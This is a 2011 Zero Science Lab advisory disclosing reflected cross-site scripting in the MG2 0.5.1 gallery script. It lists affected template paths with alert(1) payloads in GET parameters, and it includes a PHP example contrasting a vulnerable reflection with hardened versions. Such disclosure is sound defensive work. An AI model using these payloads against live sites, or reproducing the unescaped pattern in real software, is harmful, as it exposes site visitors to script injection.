MG2 0.5.1 Multiple XSS Vulnerabilities

2011-02-12T00:00:00
ID ZSL-2011-4993
Type zeroscience
Reporter Gjoko Krstic
Modified 2011-02-12T00:00:00

Description

Title: MG2 0.5.1 Multiple XSS Vulnerabilities
Advisory ID: ZSL-2011-4993
Type: Remote
Impact: Cross-Site Scripting
Risk: (2/5)
Release Date: 12.02.2011

Summary

MG2 is the sequel to the popular image gallery script MiniGal. One of the highlights of MG2 is that it supports PHP running in safe mode, which is unsupported by almost all other dynamic image gallery scripts on the web.

Description

MG2 suffers from multiple XSS vulnerabilities. Several GET parameters are not sanitized before being reflected back to the user in the response. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
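The following is an added illustration of the flaw class, not MG2's own source: a hypothetical template that reflects a numeric request parameter into its HTML unescaped, beside the same template hardened with the two fixes that close reflected XSS of this kind (type enforcement for parameters that are ids by design, and HTML encoding at the point of output). The function names and the `?list=` parameter usage are assumptions for the example.

```php
<?php
// Added example (not MG2's code): vulnerable reflection of a GET parameter
// and the hardened equivalent. Run with `php this_file.php`.

// Vulnerable pattern (hypothetical): the value of ?list= is written straight
// into the page, so a value such as 25<script>alert(1)</script> is reflected
// as live markup in the visitor's browser.
function render_list_vulnerable(array $get): string
{
    $list = isset($get['list']) ? $get['list'] : '';
    return '<a href="index.php?list=' . $list . '">Folder ' . $list . '</a>';
}

// Hardened pattern: the advisory's affected parameters (list, id, editID) are
// numeric ids, so reject anything that is not an integer before use, and still
// HTML-encode at output so the template stays safe if the type check is ever
// relaxed. FILTER_VALIDATE_INT is used instead of a bare (int) cast because a
// cast silently turns "25<script>" into 25 and hides the tampering.
function render_list_fixed(array $get): string
{
    $raw = isset($get['list']) ? $get['list'] : '';
    if (filter_var($raw, FILTER_VALIDATE_INT) === false) {
        return '<p>Invalid folder id.</p>';
    }
    $safe = htmlspecialchars((string) (int) $raw, ENT_QUOTES, 'UTF-8');
    return '<a href="index.php?list=' . $safe . '">Folder ' . $safe . '</a>';
}

// For free-text parameters (where an integer check does not apply) the fix is
// the output encoding alone: ENT_QUOTES covers both attribute and text context.
function render_text_fixed(string $value): string
{
    return '<p>' . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Constructed request mirroring the payload shape quoted in the advisory.
$request = ['list' => '25<script>alert(1)</script>'];

echo render_list_vulnerable($request), "\n"; // reflects the payload unchanged
echo render_list_fixed($request), "\n";      // rejects the request
echo render_text_fixed($request['list']), "\n"; // encodes < > " ' as entities
```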

Vendor

MiniGal - <http://www.minigal.dk>

Affected Version

0.5.1

Tested On

Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41

Vendor Status

N/A

PoC

mg2_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://securityreason.com/exploitalert/9974>
[2] <http://packetstormsecurity.org/files/98467>
[3] <http://securityreason.com/wlb_show/WLB-2011020060>
[4] <http://www.securityfocus.com/bid/46378>
[5] <http://xforce.iss.net/xforce/xfdb/65452>

Changelog

[12.02.2011] - Initial release
[15.02.2011] - Added reference [2] and [3]
[16.02.2011] - Added reference [4]
[18.02.2011] - Added reference [5]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk


###########################################################
#                                                         #
#        MG2 0.5.1 Multiple XSS Vulnerabilities           #
#                                                         #
#                                                         #
# Vendor: MiniGal                                         #
# Product web page: http://www.minigal.dk                 #
# Affected version: 0.5.1                                 #
#                                                         #
# Summary: MG2 is the sequel to the popular               #
# image gallery script MiniGal. One of the                #
# highlights of MG2 is, that it supports PHP              #
# running in safe mode which is unsupported               #
# by almost all other dynamic image gallery               #
# scripts on the web.                                     #
#                                                         #
# Desc: MG2 suffers from multiple XSS vulns.              #
# Several parameters are vulnerable that are              #
# not sanitized before being returned to the              #
# user. This can be exploited to execute                  #
# arbitrary HTML and script code in a user's              #
# browser session in context of an affected               #
# site.                                                   #
#                                                         #
# Tested on: MS WinXP Pro SP3 (EN), XAMPP                 #
#                                                         #
# Vulnerability discovered by: LiquidWorm                 #
#                                                         #
# Advisory ID: ZSL-2011-4993                              #
#                                                         #
#                                                         #
# 03.02.2011                                              #
#                                                         #
#                                                         #
###########################################################
       |                                          |
       |                                          |
       |                                          |
 .-----0------------------------------------------0-----.
 |                                                      |
 |                                                      |
 | /mg2/skins/rounded/templates/thumbnails_password.php |
 | - param(GET): list=25<script>alert(1)</script>       |
 | - param(GET): id=25<script>alert(1)</script>         |
 |                                                      |
 | /mg2/skins/rounded/templates/viewimage_comments.php  |
 | - param(GET): id=31<script>alert(1)</script>         |
 |                                                      |
 | /mg2/skins/admin/admin1_menu.php                     |
 | - param(GET): list=41<script>alert(1)</script>       |
 |                                                      |
 | /mg2/skins/admin/admin2_comments.php                 |
 | - param(GET): list=45<script>alert(1)</script>       |
 |                                                      |
 | /mg2/skins/admin/admin2_edit.php                     |
 | - param(GET): editID=53<script>alert(1)</script>     |
 |                                                      |
 | /mg2/skins/admin/admin2_newfolder.php                |
 | - param(GET): list=59<script>alert(1)</script>       |
 |                                                      |
 | /mg2/skins/admin/admin3_folders.php                  |
 | - param(GET): list=71<script>alert(1)</script>       |
 |                                                      |
 |                                                      |
 *------------------------------------------------------*



                                                        Created by:
                                                        MiniAdvisory Creator v1.0.3g
                                                        2011 © Zero Science Lab